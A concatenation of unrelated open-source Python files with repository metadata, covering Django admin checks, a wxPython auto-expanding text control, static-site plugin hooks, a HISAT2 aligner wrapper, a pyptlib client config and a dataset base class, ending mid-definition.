def _check_exclude_of_parent_model(self, obj, parent_model):
# Do not perform more specific checks if the base checks result in an
# error.
errors = super(InlineModelAdminChecks, self)._check_exclude(obj)
if errors:
return []
# Skip if `fk_name` is invalid.
if self._check_relation(obj, parent_model):
return []
if obj.exclude is None:
return []
fk = _get_foreign_key(parent_model, obj.model, fk_name=obj.fk_name)
if fk.name in obj.exclude:
return [
checks.Error(
"Cannot exclude the field '%s', because it is the foreign key "
"to the parent model '%s.%s'." % (
fk.name, parent_model._meta.app_label, parent_model._meta.object_name
),
hint=None,
obj=obj.__class__,
id='admin.E201',
)
]
else:
return []
def _check_relation(self, obj, parent_model):
try:
_get_foreign_key(parent_model, obj.model, fk_name=obj.fk_name)
except ValueError as e:
return [checks.Error(e.args[0], hint=None, obj=obj.__class__, id='admin.E202')]
else:
return []
def _check_extra(self, obj):
""" Check that extra is an integer. """
if not isinstance(obj.extra, int):
return must_be('an integer', option='extra', obj=obj, id='admin.E203')
else:
return []
def _check_max_num(self, obj):
""" Check that max_num is an integer. """
if obj.max_num is None:
return []
elif not isinstance(obj.max_num, int):
return must_be('an integer', option='max_num', obj=obj, id='admin.E204')
else:
return []
def _check_min_num(self, obj):
""" Check that min_num is an integer. """
if obj.min_num is None:
return []
elif not isinstance(obj.min_num, int):
return must_be('an integer', option='min_num', obj=obj, id='admin.E205')
else:
return []
def _check_formset(self, obj):
""" Check formset is a subclass of BaseModelFormSet. """
if not issubclass(obj.formset, BaseModelFormSet):
return must_inherit_from(parent='BaseModelFormSet', option='formset',
obj=obj, id='admin.E206')
else:
return []
def must_be(type, option, obj, id):
return [
checks.Error(
"The value of '%s' must be %s." % (option, type),
hint=None,
obj=obj.__class__,
id=id,
),
]
def must_inherit_from(parent, option, obj, id):
return [
checks.Error(
"The value of '%s' must inherit from '%s'." % (option, parent),
hint=None,
obj=obj.__class__,
id=id,
),
]
def refer_to_missing_field(field, option, model, obj, id):
return [
checks.Error(
"The value of '%s' refers to '%s', which is not an attribute of '%s.%s'." % (
option, field, model._meta.app_label, model._meta.object_name
),
hint=None,
obj=obj.__class__,
id=id,
),
]
| {
"content_hash": "e30bfe392f15bd0024bb85501bbf1457",
"timestamp": "",
"source": "github",
"line_count": 1015,
"max_line_length": 117,
"avg_line_length": 39.92512315270936,
"alnum_prop": 0.5122396604481295,
"repo_name": "himleyb85/django",
"id": "48539fe9e5935da5a3c33adb563436e2d601a9ec",
"size": "40548",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "django/contrib/admin/checks.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "52334"
},
{
"name": "HTML",
"bytes": "170527"
},
{
"name": "JavaScript",
"bytes": "256023"
},
{
"name": "Makefile",
"bytes": "125"
},
{
"name": "Python",
"bytes": "11481044"
},
{
"name": "Shell",
"bytes": "809"
},
{
"name": "Smarty",
"bytes": "130"
}
],
"symlink_target": ""
} |
"""
This module contains the `ExpandoTextCtrl` which is a multi-line
text control that will expand its height on the fly to be able to show
all the lines of the content of the control.
"""
import wx
import wx.lib.newevent
# This event class and binder object can be used to catch
# notifications that the ExpandoTextCtrl has resized itself and
# that layout adjustments may need to be made.
wxEVT_ETC_LAYOUT_NEEDED = wx.NewEventType()
EVT_ETC_LAYOUT_NEEDED = wx.PyEventBinder( wxEVT_ETC_LAYOUT_NEEDED, 1 )
#---------------------------------------------------------------------------
class ExpandoTextCtrl(wx.TextCtrl):
"""
The ExpandoTextCtrl is a multi-line wx.TextCtrl that will
    adjust its height on the fly as needed to accommodate the number of
lines needed to display the current content of the control. It is
assumed that the width of the control will be a fixed value and
that only the height will be adjusted automatically. If the
control is used in a sizer then the width should be set as part of
the initial or min size of the control.
When the control resizes itself it will attempt to also make
necessary adjustments in the sizer hierarchy it is a member of (if
    any) but if that is not sufficient then the programmer can catch
the EVT_ETC_LAYOUT_NEEDED event in the container and make any
other layout adjustments that may be needed.
"""
_defaultHeight = -1
def __init__(self, parent, id=-1, value="",
pos=wx.DefaultPosition, size=wx.DefaultSize,
style=0, validator=wx.DefaultValidator, name="expando"):
# find the default height of a single line control
self.defaultHeight = self._getDefaultHeight(parent)
# make sure we default to that height if none was given
w, h = size
if h == -1:
h = self.defaultHeight
# always use the multi-line style
style = style | wx.TE_MULTILINE | wx.TE_NO_VSCROLL | wx.TE_RICH2
# init the base class
wx.TextCtrl.__init__(self, parent, id, value, pos, (w, h),
style, validator, name)
# save some basic metrics
self.extraHeight = self.defaultHeight - self.GetCharHeight()
self.numLines = 1
self.maxHeight = -1
self.minHeight = -1
if value:
wx.CallAfter(self._adjustCtrl)
self.Bind(wx.EVT_TEXT, self.OnTextChanged)
def SetMinHeight(self,h):
self.minHeight = h
if h != -1 and self.GetSize().height < h:
self.SetSize((-1, h))
def GetMinHeight(self):
return self.minHeight
def SetMaxHeight(self, h):
"""
Sets the max height that the control will expand to on its
own, and adjusts it down if needed.
"""
self.maxHeight = h
if h != -1 and self.GetSize().height > h:
self.SetSize((-1, h))
def GetMaxHeight(self):
"""Sets the max height that the control will expand to on its own"""
return self.maxHeight
def SetFont(self, font):
wx.TextCtrl.SetFont(self, font)
self.numLines = -1
self._adjustCtrl()
def WriteText(self, text):
        # work around a wxMac bug where no EVT_TEXT event is sent
        # when calling WriteText
wx.TextCtrl.WriteText(self, text)
self._adjustCtrl()
def AppendText(self, text):
# Instead of using wx.TextCtrl.AppendText append and set the
# insertion point ourselves. This works around a bug on wxMSW
# where it scrolls the old text out of view, and since there
# is no scrollbar there is no way to get back to it.
self.SetValue(self.GetValue() + text)
self.SetInsertionPointEnd()
def OnTextChanged(self, evt):
# check if any adjustments are needed on every text update
self._adjustCtrl()
evt.Skip()
def _adjustCtrl(self):
# if the current number of lines is different than before
# then recalculate the size needed and readjust
numLines = self.GetNumberOfLines()
if numLines != self.numLines:
self.numLines = numLines
charHeight = self.GetCharHeight()
height = numLines * charHeight + self.extraHeight
#TODO: should be more precise
if self.minHeight != -1 and height < self.minHeight and self.Size.height > self.minHeight:
height = self.minHeight
if self.maxHeight != -1 and height > self.maxHeight and self.Size.height < self.maxHeight:
height = self.maxHeight
if not (self.maxHeight != -1 and height > self.maxHeight) and not (self.minHeight != -1 and height < self.minHeight):
# The size is changing... if the control is not in a
# sizer then we just want to change the size and
# that's it, the programmer will need to deal with
# potential layout issues. If it is being managed by
# a sizer then we'll change the min size setting and
# then try to do a layout. In either case we'll also
# send an event so the parent can handle any special
# layout issues that it wants to deal with.
if self.GetContainingSizer() is not None:
mw, mh = self.GetMinSize()
self.SetMinSize((mw, height))
if self.GetParent().GetSizer() is not None:
self.GetParent().Layout()
else:
self.GetContainingSizer().Layout()
else:
self.SetSize((-1, height))
# send notification that layout is needed
evt = wx.PyCommandEvent(wxEVT_ETC_LAYOUT_NEEDED, self.GetId())
evt.SetEventObject(self)
evt.height = height
evt.numLines = numLines
self.GetEventHandler().ProcessEvent(evt)
def _getDefaultHeight(self, parent):
        # check for a cached value
if self.__class__._defaultHeight != -1:
return self.__class__._defaultHeight
# otherwise make a single line textctrl and find out its default height
tc = wx.TextCtrl(parent)
sz = tc.GetSize()
tc.Destroy()
self.__class__._defaultHeight = sz.height
return sz.height
if 'wxGTK' in wx.PlatformInfo: ## and wx.VERSION < (2,7): it's broke again in 2.7.2...
# the wxGTK version of GetNumberOfLines in 2.6 doesn't count
# wrapped lines, so we need to implement our own. This is
# fixed in 2.7.
def GetNumberOfLines(self):
text = self.GetValue()
width = self.GetSize().width
dc = wx.ClientDC(self)
dc.SetFont(self.GetFont())
count = 0
for line in text.split('\n'):
count += 1
w, h = dc.GetTextExtent(line)
if w > width:
# the width of the text is wider than the control,
# calc how many lines it will be wrapped to
count += self._wrapLine(line, dc, width)
if not count:
count = 1
return count
def _wrapLine(self, line, dc, width):
# Estimate where the control will wrap the lines and
# return the count of extra lines needed.
pte = dc.GetPartialTextExtents(line)
width -= wx.SystemSettings.GetMetric(wx.SYS_VSCROLL_X)
idx = 0
start = 0
count = 0
spc = -1
while idx < len(pte):
if line[idx] == ' ':
spc = idx
if pte[idx] - start > width:
# we've reached the max width, add a new line
count += 1
# did we see a space? if so restart the count at that pos
if spc != -1:
idx = spc + 1
spc = -1
start = pte[idx]
else:
idx += 1
return count
#---------------------------------------------------------------------------
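# A minimal, hedged usage sketch (not part of the original module): it shows
# how an ExpandoTextCtrl might be placed in a sizer and how the
# EVT_ETC_LAYOUT_NEEDED event can be handled; the frame/sizer layout below is
# only an illustrative assumption.
if __name__ == '__main__':
    app = wx.App(False)
    frame = wx.Frame(None, -1, "ExpandoTextCtrl demo")
    panel = wx.Panel(frame)
    expando = ExpandoTextCtrl(panel, size=(250, -1),
                              value="Type here and watch the control grow.")
    sizer = wx.BoxSizer(wx.VERTICAL)
    sizer.Add(expando, 0, wx.EXPAND | wx.ALL, 10)
    panel.SetSizer(sizer)
    def on_layout_needed(evt):
        # Resize the frame so the expanded control remains fully visible.
        frame.Fit()
    expando.Bind(EVT_ETC_LAYOUT_NEEDED, on_layout_needed)
    frame.Fit()
    frame.Show()
    app.MainLoop()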
| {
"content_hash": "ed9ccabfedc0e9b3593fe9e3baa326a9",
"timestamp": "",
"source": "github",
"line_count": 215,
"max_line_length": 129,
"avg_line_length": 38.64186046511628,
"alnum_prop": 0.5652383245064998,
"repo_name": "ifwe/wxpy",
"id": "4c5b876eac82f0c20fe33ead4c6ac70f536132ce",
"size": "8834",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "wx/lib/expando.py",
"mode": "33188",
"license": "mit",
"language": [],
"symlink_target": ""
} |
from django.contrib import admin
from . import models
class GithubFeedAdmin(admin.ModelAdmin):
list_display = ['username']
fields = ['username', 'token', 'api_key']
search_fields = ['username']
admin.site.register(models.GithubFeed, GithubFeedAdmin)
| {
"content_hash": "02192a57d4ca4f41ba5485d310fee51e",
"timestamp": "",
"source": "github",
"line_count": 10,
"max_line_length": 55,
"avg_line_length": 26.5,
"alnum_prop": 0.720754716981132,
"repo_name": "harveyr/django-aggregape",
"id": "f4c825dcfa5051e82067a2926a65d881722e0c68",
"size": "265",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "admin.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "137091"
},
{
"name": "JavaScript",
"bytes": "58577"
},
{
"name": "Python",
"bytes": "2575"
}
],
"symlink_target": ""
} |
def preBuildPage(page, context, data):
"""
Called prior to building a page.
:param page: The page about to be built
:param context: The context for this page (you can modify this, but you must return it)
:param data: The raw body for this page (you can modify this).
:returns: Modified (or not) context and data.
"""
return context, data
def postBuildPage(page):
"""
Called after building a page.
:param page: The page that was just built.
:returns: None
"""
pass
def preBuildStatic(static):
"""
Called before building (copying to the build folder) a static file.
:param static: The static file about to be built.
:returns: None
"""
pass
def postBuildStatic(static):
"""
Called after building (copying to the build folder) a static file.
:param static: The static file that was just built.
:returns: None
"""
pass
def preBuild(site):
"""
Called prior to building the site, after loading configuration and plugins.
A good time to register your externals.
:param site: The site about to be built.
:returns: None
"""
pass
def postBuild(site):
"""
Called after building the site.
:param site: The site that was just built.
:returns: None
"""
pass
def preDeploy(site):
"""
Called prior to deploying the site (built files)
A good time to configure custom headers
:param site: The site about to be deployed.
:returns: None
"""
pass
def postDeploy(site):
"""
Called after deploying the site (built files)
    :param site: The site that was just deployed.
:returns: None
"""
pass
def preDeployFile(file):
"""
Called prior to deploying a single built file
:param file: The file about to be deployed.
:returns: None
"""
pass
ORDER = -1
DEFAULTS = [
'preBuildPage',
'postBuildPage',
'preBuildStatic',
'postBuildStatic',
'preBuild',
'postBuild',
'preDeploy',
'postDeploy',
'preDeployFile',
]
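# A hedged sketch (not part of this module) of what a user-written plugin
# implementing one of the hooks above might look like; the 'build_time'
# context key is an illustrative assumption.
#
#     import datetime
#
#     def preBuildPage(page, context, data):
#         # Expose the build timestamp to every page template.
#         context['build_time'] = datetime.datetime.utcnow().isoformat()
#         return context, data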
| {
"content_hash": "55deddb3f42fcf212d4fff799f3a2d8a",
"timestamp": "",
"source": "github",
"line_count": 109,
"max_line_length": 91,
"avg_line_length": 18.990825688073393,
"alnum_prop": 0.6314009661835749,
"repo_name": "Knownly/Cactus",
"id": "22561d01436b17a5cc71ee60dd87e8bf4682f2a8",
"size": "2115",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "cactus/plugin/defaults.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "261"
},
{
"name": "HTML",
"bytes": "8133"
},
{
"name": "JavaScript",
"bytes": "60"
},
{
"name": "Makefile",
"bytes": "448"
},
{
"name": "Python",
"bytes": "237704"
}
],
"symlink_target": ""
} |
from distutils.core import setup
setup(name='gather-agent',
version='0.4.1',
description='Simple agent that gathers basic system statistics to RHQ Metrics',
      author='Michael Burman',
author_email='miburman@redhat.com',
url='http://github.com/burmanm/gather_agent',
      packages=['gather_agent']
)
| {
"content_hash": "6895267e2d025b974b9f0cecc91fddaa",
"timestamp": "",
"source": "github",
"line_count": 10,
"max_line_length": 85,
"avg_line_length": 33.2,
"alnum_prop": 0.6746987951807228,
"repo_name": "burmanm/gather_agent",
"id": "b42926ae91e6023fa9b1ece1596bb1de434edc68",
"size": "355",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "11803"
}
],
"symlink_target": ""
} |
import os
import sys
import glob
import json
import unittest
sys.path.append(os.path.dirname(os.getcwd()))
import tasks
class TestInfoFiles(unittest.TestCase):
"""Test case for checking info files exist
for each task and have a valid structure.
"""
@classmethod
def setUpClass(self):
self.tasks = set(tasks.__all__)
self.tasks.remove('template_task')
self.tasks.remove('dev_pretend_py')
self.tasks.remove('ogr')
self.tasks.remove('sample_task')
self.tasks.remove('utils')
self.info_dir = os.path.abspath(os.path.join(os.getcwd(), '..', 'info'))
self.json_files = set([os.path.basename(f).split('.')[0] for f in glob.glob(os.path.join(self.info_dir, '*.info.json'))])
self.names = []
self.runner = set()
self.display = set()
files_to_test = self.json_files.intersection(self.tasks)
for name in files_to_test:
test_file = os.path.join(self.info_dir, '{0}.info.json'.format(name))
with open(test_file) as f:
print test_file
d = json.load(f)
self.names.append(d['name'])
self.runner.add(d['runner'])
self.display.add(d['display'].keys()[0])
def test_json_exists(self):
"""Ensure an info.json file exists for each task"""
self.assertEqual(self.tasks.issubset(self.json_files), True)
def test_json_names(self):
"""Verify each info.json has a valid name field and value"""
self.assertEqual(sorted(list(self.tasks)), sorted(self.names))
def test_json_runner(self):
self.assertEqual(len(list(self.runner)) == 1 and list(self.runner)[0] == 'python', True)
def test_json_display(self):
"""Default display should be set to 'en' for all info.json files"""
self.assertEqual(len(list(self.display)) == 1 and list(self.display)[0] == 'en', True)
if __name__ == '__main__':
unittest.main()
| {
"content_hash": "7c13b5fc50f52d70858f44d1e003de40",
"timestamp": "",
"source": "github",
"line_count": 53,
"max_line_length": 129,
"avg_line_length": 37.43396226415094,
"alnum_prop": 0.6038306451612904,
"repo_name": "voyagersearch/voyager-py",
"id": "9be7a1ed9466052b8e230e4d4a490f23a3f62b75",
"size": "1984",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "processing/test/test_info_files.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "13"
},
{
"name": "Python",
"bytes": "1008753"
},
{
"name": "Shell",
"bytes": "14"
}
],
"symlink_target": ""
} |
'''
*****************************************
Author: zhlinh
Email: zhlinhng@gmail.com
Version: 0.0.1
Created Time: 2016-05-07
Last_modify: 2016-05-07
******************************************
'''
'''
Given an array containing n distinct numbers taken from 0, 1, 2, ..., n,
find the one that is missing from the array.
For example,
Given nums = [0, 1, 3] return 2.
Note:
Your algorithm should run in linear runtime complexity.
Could you implement it using only constant extra space complexity?
Credits:
Special thanks to @jianchao.li.fighter for adding this problem and
creating all test cases.
'''
class Solution(object):
def missingNumber(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
n = len(nums)
res = n
for i in range(n):
res ^= nums[i]
res ^= i
return res
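# A brief illustration (not part of the original solution) of why the XOR
# trick works: res starts at n, and every index i and value nums[i] is folded
# in, so any number appearing both as an index and as a value cancels out
# (x ^ x == 0), leaving only the missing one.
# For nums = [0, 1, 3]: indices plus the initial value contribute 0^1^2^3,
# the values contribute 0^1^3, so res = 2.
if __name__ == '__main__':
    # Quick check with the example from the problem statement (expects 2).
    print(Solution().missingNumber([0, 1, 3]))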
| {
"content_hash": "836c8d7297f427823cfc6b88c36ff461",
"timestamp": "",
"source": "github",
"line_count": 39,
"max_line_length": 72,
"avg_line_length": 23.076923076923077,
"alnum_prop": 0.55,
"repo_name": "zhlinh/leetcode",
"id": "ecf397e9d0c99fcd87b579aecb9ccc2da380bfd1",
"size": "946",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "0268.Missing Number/solution.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "478111"
}
],
"symlink_target": ""
} |
import pandas as pd
from h2o.estimators.xgboost import *
from tests import pyunit_utils
import unittest
import sys
class TestXGBoostUnicode(unittest.TestCase):
@unittest.skipIf(sys.version_info[0] < 3, "not tested on 2.7: csv.writer fails on 'ascii' codec can't encode character") #unrelated issue
def test_xgboost_unicode(self):
assert H2OXGBoostEstimator.available()
unic_df = pd.DataFrame({u'\xA5': [2, 3, 1], 'y': [0, 0, 1], 'x': [0.3, 0.1, 0.9]})
h2o_unic = h2o.H2OFrame(unic_df, destination_frame="unic_df")
xg1 = H2OXGBoostEstimator(model_id = 'xg1', ntrees = 3)
xg1.train(x = [u'\xA5', 'x'], y = "y", training_frame=h2o_unic)
if __name__ == "__main__":
pyunit_utils.standalone_test(unittest.main)
else:
suite = unittest.TestLoader().loadTestsFromTestCase(TestXGBoostUnicode)
    unittest.TextTestRunner().run(suite)
| {
"content_hash": "b55dd990701abb4f808aa05137c2cd93",
"timestamp": "",
"source": "github",
"line_count": 24,
"max_line_length": 141,
"avg_line_length": 36.916666666666664,
"alnum_prop": 0.6704288939051919,
"repo_name": "h2oai/h2o-dev",
"id": "404d36c05eeb2145dda43b65f4344c740317062d",
"size": "886",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "h2o-py/tests/testdir_jira/pyunit_pubdev_5207_xgb_unicode.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "5090"
},
{
"name": "CSS",
"bytes": "162399"
},
{
"name": "CoffeeScript",
"bytes": "267048"
},
{
"name": "Emacs Lisp",
"bytes": "6465"
},
{
"name": "HTML",
"bytes": "140849"
},
{
"name": "Java",
"bytes": "6216622"
},
{
"name": "JavaScript",
"bytes": "38932"
},
{
"name": "Jupyter Notebook",
"bytes": "5585408"
},
{
"name": "Makefile",
"bytes": "34105"
},
{
"name": "Python",
"bytes": "2644394"
},
{
"name": "R",
"bytes": "1848754"
},
{
"name": "Rebol",
"bytes": "7059"
},
{
"name": "Ruby",
"bytes": "3506"
},
{
"name": "Scala",
"bytes": "22830"
},
{
"name": "Shell",
"bytes": "47513"
},
{
"name": "TeX",
"bytes": "579960"
}
],
"symlink_target": ""
} |
"""
Copyright 2017, Ben Langmead <langmea@cs.jhu.edu>
Concrete subclass for HISAT2 aligner.
"""
import os
import logging
import sys
from operator import itemgetter
from subprocess import Popen
from aligner import Aligner
try:
from Queue import Queue
except ImportError:
from queue import Queue # python 3.x
class Hisat2(Aligner):
""" Encapsulates a HISAT2 process. The input can be a FASTQ
file, or a Queue onto which the caller enqueues reads.
Similarly, output can be a SAM file, or a Queue from which the
caller dequeues SAM records. All records are textual; parsing
is up to the user. """
def __init__(self,
cmd,
aligner_args,
aligner_unpaired_args,
aligner_paired_args,
index,
unpaired=None,
paired=None,
paired_combined=None,
pairs_only=False,
sam=None,
quiet=False,
input_format=None):
""" Create new process.
Inputs:
'unpaired' is an iterable over unpaired input filenames.
'paired' is an iterable over pairs of paired-end input
filenames. If both are None, then input reads will be
taken over the inQ. If either are non-None, then a call
to inQ will raise an exception.
Outputs:
'sam' is a filename where output SAM records will be
stored. If 'sam' is none, SAM records will be added to
the outQ.
"""
if index is None:
raise RuntimeError('Must specify --index when aligner is HISAT2')
cmd_toks = cmd.split()
popen_stdin, popen_stdout, popen_stderr = None, None, None
self.inQ, self.outQ = None, None
# Make sure input arguments haven't been specified already
for tok in ['-U', '-1', '-2']:
assert tok not in cmd_toks
# Compose input arguments
input_args = []
# Some of the HISAT 2's format-related parameters take an
# argument (e.g. -U, -1, -2, --tab5, --tab6) and some don't
# (-f, -q, -r, -c)
if input_format in ['fastq', 'fasta', 'raw']:
if input_format == 'fastq':
input_args.append('-q')
            elif input_format == 'fasta':
input_args.append('-f')
elif input_format == 'raw':
input_args.append('-r')
input_format = None
if unpaired is not None:
input_args.append(('--%s' % input_format) if input_format is not None else '-U')
input_args.append(','.join(unpaired))
input_args.extend(aligner_unpaired_args)
if paired is not None:
assert input_format not in ['tab5', 'tab6', '12']
paired = list(paired) # because we traverse it multiple times
input_args.extend(['-1', ','.join(map(itemgetter(0), paired))])
input_args.extend(['-2', ','.join(map(itemgetter(1), paired))])
input_args.extend(aligner_paired_args)
if paired_combined is not None:
assert input_format is not None
input_args.extend(['--%s' % input_format, ','.join(paired_combined)])
input_args.extend(aligner_paired_args)
if unpaired is None and paired is None and paired_combined is None:
raise RuntimeError("Must specify one or more of: unpaired, paired, paired_combined")
# Make sure output arguments haven't been specified already
assert '-S' not in cmd_toks
# Compose output arguments
output_args = []
if sam is not None:
output_args.extend(['-S', sam])
else:
raise RuntimeError("Must specify SAM output")
index_args = ['-x', index]
# Put all the arguments together
input_args.extend(aligner_args)
cmd += ' '
cmd += ' '.join(input_args + output_args + index_args)
logging.info('HISAT 2 command: ' + cmd)
if quiet:
popen_stderr = open(os.devnull, 'w')
self.pipe = Popen(cmd, shell=True,
stdin=popen_stdin, stdout=popen_stdout, stderr=popen_stderr,
bufsize=-1, close_fds='posix' in sys.builtin_module_names)
@staticmethod
def supports_mix():
return True
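# A hedged usage sketch (not part of the original module): the index prefix,
# read files and extra arguments are made-up placeholders, and constructing
# the object immediately launches a hisat2 process, so a local HISAT2 install
# and a real index would be required.
#
#     aligner = Hisat2(cmd='hisat2',
#                      aligner_args=['--threads', '4'],
#                      aligner_unpaired_args=[],
#                      aligner_paired_args=[],
#                      index='/path/to/index_prefix',
#                      paired=[('reads_1.fq', 'reads_2.fq')],
#                      sam='out.sam',
#                      input_format='fastq',
#                      quiet=True)
#     aligner.pipe.wait()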
| {
"content_hash": "1643610a9869799d6bdd255beb844b85",
"timestamp": "",
"source": "github",
"line_count": 116,
"max_line_length": 96,
"avg_line_length": 38.75,
"alnum_prop": 0.5563959955506118,
"repo_name": "BenLangmead/qtip",
"id": "6ee7d37ef90535c378ab93b7254cdbdcdd2f2249",
"size": "4495",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "hisat2.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "5060"
},
{
"name": "C++",
"bytes": "224703"
},
{
"name": "Makefile",
"bytes": "8422"
},
{
"name": "Python",
"bytes": "136883"
},
{
"name": "Shell",
"bytes": "3774"
}
],
"symlink_target": ""
} |
"""
Low-level parts of pyptlib that are only useful to clients.
"""
from pyptlib.config import Config
class ClientConfig(Config):
"""
A client-side pyptlib configuration.
:raises: :class:`pyptlib.config.EnvError` if environment was incomplete or corrupted.
"""
def __init__(self):
Config.__init__(self)
self.transports = self.get('TOR_PT_CLIENT_TRANSPORTS').split(',')
if '*' in self.transports:
self.allTransportsEnabled = True
self.transports.remove('*')
def getClientTransports(self): # XXX why is this client-specific ???
"""
Return a list of strings representing the client transports reported by Tor.
If present, the wildcard transport, '*', is stripped from this list and used to set allTransportsEnabled to True.
:returns: list of transports
"""
return self.transports
def writeMethod(self, name, socksVersion, addrport, args=None, optArgs=None):
"""
Write a message to stdout announcing that a transport was
successfully launched.
:param str name: Name of transport.
:param int socksVersion: The SOCKS protocol version.
:param tuple addrport: (addr,port) where this transport is listening for connections.
:param str args: ARGS field for this transport.
:param str optArgs: OPT-ARGS field for this transport.
"""
methodLine = 'CMETHOD %s socks%s %s:%s' % (name, socksVersion,
addrport[0], addrport[1])
if args and len(args) > 0:
methodLine = methodLine + ' ARGS=' + args.join(',')
if optArgs and len(optArgs) > 0:
methodLine = methodLine + ' OPT-ARGS=' + args.join(',')
self.emit(methodLine)
def writeMethodError(self, name, message):
"""
Write a message to stdout announcing that we failed to launch a transport.
:param str name: Name of transport.
:param str message: Error message.
"""
self.emit('CMETHOD-ERROR %s %s' % (name, message))
def writeMethodEnd(self):
"""
        Write a message to stdout announcing that we finished launching transports.
"""
self.emit('CMETHODS DONE')
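# A hedged usage sketch (not part of the original module): it assumes Tor has
# already populated the managed-proxy environment (TOR_PT_* variables) that
# the base Config expects; the address and port reported below are
# illustrative placeholders.
#
#     from pyptlib.config import EnvError
#
#     try:
#         config = ClientConfig()
#     except EnvError:
#         ...  # environment was missing or corrupted; report and exit
#     for name in config.getClientTransports():
#         # launch the transport here, then announce where it listens
#         config.writeMethod(name, 5, ('127.0.0.1', 43051))
#     config.writeMethodEnd()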
| {
"content_hash": "fb22064c7780d7a9100b43222782e376",
"timestamp": "",
"source": "github",
"line_count": 69,
"max_line_length": 121,
"avg_line_length": 32.768115942028984,
"alnum_prop": 0.6218487394957983,
"repo_name": "ch3n2k/pyptlib",
"id": "33e34a61d0a4addad0d41e196c12730904d54bea",
"size": "2304",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "pyptlib/client_config.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "48859"
}
],
"symlink_target": ""
} |
from typing import Dict, List, Optional, Union, Sequence
import numpy as np
import tensorflow as tf
from typing_extensions import Literal
from odin.backend.types_helpers import DataType, LabelType
from tensorflow.python.data import Dataset
# ===========================================================================
# Helpers
# ===========================================================================
Partition = Literal['train', 'valid', 'test', 'unlabelled']
def get_partition(part,
train=None,
valid=None,
test=None,
unlabeled=None,
unlabelled=None,
**kwargs):
r""" A function for automatically select the right data partition """
part = str(part).lower().strip()
ret = None
if 'train' in part:
ret = train
elif 'valid' in part:
ret = valid
elif 'test' in part:
ret = test
elif 'unlabeled' in part or 'unlabelled' in part:
ret = unlabeled if unlabelled is None else unlabelled
for k, v in kwargs.items():
if part == str(k).strip().lower():
ret = v
break
if ret is None:
raise ValueError("No data for partition with name: '%s'" % part)
return ret
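# A small illustrative example (not part of the original module); the lists
# below are placeholder data:
#
#   get_partition('train', train=[1, 2], test=[3])        # -> [1, 2]
#   get_partition('my_split', test=[3], my_split=[9])     # -> [9] (via kwargs)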
def _merge_list(data):
return [
np.concatenate([x[i].numpy()
for x in data], axis=0)
for i in range(len(data[0]))
]
def _merge_dict(data):
data = {k: [x[k] for x in data] for k in data[0].keys()}
ret = {}
for k, v in data.items():
if tf.is_tensor(v[0]):
ret[k] = _merge_tensor(v)
elif isinstance(v[0], (tuple, list)):
ret[k] = _merge_list(v)
else:
ret[k] = _merge_dict(v)
return ret
def _merge_tensor(data):
return np.concatenate(data, axis=0)
# ===========================================================================
# Main
# ===========================================================================
class IterableDataset:
def __init__(self, *args, **kwargs):
pass
@classmethod
def data_type(cls) -> DataType:
raise NotImplementedError
@property
def label_type(self) -> LabelType:
raise NotImplementedError
@property
def name(self) -> str:
"""name of the dataset (all lower-case characters)"""
return self.__class__.__name__.lower()
@property
def has_labels(self) -> bool:
return self.n_labels > 0
@property
def n_labels(self) -> int:
return len(self.labels)
@property
def labels_indices(self) -> Dict[str, int]:
if not hasattr(self, "_labels_indices"):
self._labels_indices = {j: i for i, j in enumerate(self.labels)}
return self._labels_indices
@property
def labels(self) -> np.ndarray:
return np.array([])
@property
def shape(self) -> List[int]:
"""Return shape of single example (i.e. no batch dimension)"""
raise NotImplementedError()
@property
def full_shape(self) -> Sequence[Union[None, int]]:
"""Return the shape with batch dimension"""
return (None,) + tuple([i for i in self.shape])
@property
def binarized(self) -> bool:
raise NotImplementedError()
def create_dataset(self,
partition: Partition = 'train',
*,
batch_size: Optional[int] = 32,
drop_remainder: bool = False,
shuffle: int = 1000,
prefetch: int = tf.data.experimental.AUTOTUNE,
cache: str = '',
parallel: Optional[int] = None,
label_percent: bool = False,
seed: int = 1) -> tf.data.Dataset:
""" Create tensorflow Dataset """
raise NotImplementedError()
def numpy(self,
batch_size: int = 32,
drop_remainder: bool = False,
shuffle: int = 1000,
prefetch: int = tf.data.experimental.AUTOTUNE,
cache: str = '',
parallel: Optional[int] = None,
partition: Partition = 'train',
label_percent: bool = False,
seed: int = 1,
verbose: bool = False):
"""Return the numpy data returned when iterate the partition"""
kw = dict(locals())
kw.pop('self', None)
verbose = kw.pop('verbose')
ds = self.create_dataset(**kw)
# load the data
if verbose:
from tqdm import tqdm
ds = tqdm(ds, desc='Converting dataset to numpy')
data = [x for x in ds]
# post-process the data
if isinstance(data[0], (tuple, list)):
data = _merge_list(data)
elif tf.is_tensor(data[0]):
data = _merge_tensor(data)
elif isinstance(data[0], dict):
data = _merge_dict(data)
else:
raise NotImplementedError(f'{type(data[0])}')
return data
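# A hedged sketch (not part of the original module) of how a concrete subclass
# could implement `create_dataset` on top of tf.data; the in-memory random
# array is an illustrative stand-in for real data.
class _ToyDataset(IterableDataset):
  def __init__(self):
    super().__init__()
    self._x = np.random.rand(128, 8).astype(np.float32)
  @property
  def shape(self) -> List[int]:
    return [8]
  def create_dataset(self,
                     partition: Partition = 'train',
                     *,
                     batch_size: Optional[int] = 32,
                     drop_remainder: bool = False,
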